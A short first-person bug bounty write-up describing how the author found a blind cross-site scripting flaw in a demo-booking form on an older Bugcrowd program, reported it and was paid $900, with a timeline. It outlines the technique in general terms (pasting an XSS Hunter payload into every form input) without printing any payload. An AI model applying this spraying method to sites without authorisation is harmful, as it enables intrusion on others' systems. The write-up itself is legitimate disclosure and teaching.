Bug Bounty
Hello Guys!, This is my First Ever writeup. Today i will tell you about my First Bug
Bounty Earning.
It was a Blind XSS ( Blind XSS are awesome 🔥 )
First I went
to Bugcrowd and start finding a good program for me.
At that time i thought why not choose
the old program because there are many hunters hunting on newly added programs.
so i went
to bugcrowd.com/programs and
click Last >> Then i select a program that have *.target.tld
I open homepage (redacted.com) and start
looking for keywords like Contact Us, Customer Support, Help
I
found get a demo button, I clicked and found that there is a form
for demo slot booking. 
I paste my xsshunter's basic payload on every input i see.
after 10 to
15 hours, I got a mail from xsshunter, I receive multiple fires from redacted.com.
I report
immediately and tell them that some of your booking form inputs are not sanitized and vulnerable
to blind xss.
I showed them PoC, IPs, etc. details
After 4 Days, they Triaged with P2
severity
i was so happy, i can't belive this because the program is one of the oldest
program on bugcrowd.
After 2 Days they rewarded me with $900
and 20 Points
I got mad that day, words
can't describe that feeling.
Special Thank to all my Mentors @thecyberzeel @AnubhavSingh_ @IAmMandatory and Bugcrowd
Here is the Tip : Programs add new
features time to time and these are mostly vulnerable, so work on old programs
too.
Timeline:
[19 Jun
2021] : Bug Submitted
[23 Jun 2021] : Accepted and Triaged as P2
[25 Jun 2021] : Rewarded
$900
[23 Dec 2021] : Resolved